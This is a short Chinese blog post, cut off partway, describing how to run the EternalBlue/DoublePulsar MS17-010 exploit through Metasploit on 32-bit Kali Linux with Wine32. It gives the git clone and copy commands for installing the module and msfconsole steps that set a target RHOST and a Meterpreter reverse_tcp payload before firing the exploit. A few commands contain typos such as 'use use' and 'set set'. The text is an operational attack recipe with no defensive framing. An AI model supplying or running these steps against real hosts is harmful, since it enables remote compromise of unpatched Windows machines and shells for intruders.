MSF使用MS17-010

本文档详细介绍了在Kali Linux 32位环境下,利用Wine32安装并运行Metasploit Framework来执行MS17-010漏洞攻击的步骤。在过程中,可能会遇到wine32未创建.wine目录导致的错误,以及针对64位目标系统需要调整注入程序的问题。同时提供了相关参考资料以便进一步学习。
摘要由CSDN通过智能技术生成

0x01 环境配置

  • kali32位(wine32只能在32位下运行)
  • 安装wine32 apt-get install wine32

0x02 使用步骤

1、 msfupdate无法更新该插件,所以需要从github下载,命令git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit

2、复制到msf的smb目录下:cp eternalblue_doublepulsar.rb /usr/share/metasploit-framework/modules/exploits/windows/smb

3、运行msf

> msfconsole
> use use exploit/windows/smb/eternalblue_doublepulsar
> set RHOST xx.xx.xx.xx
> set set payload windows/x64/meterpreter/reverse_tcp
> exploit

0x03 踩坑

1、wine32装好后,/root目录下没有.wine目录,

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值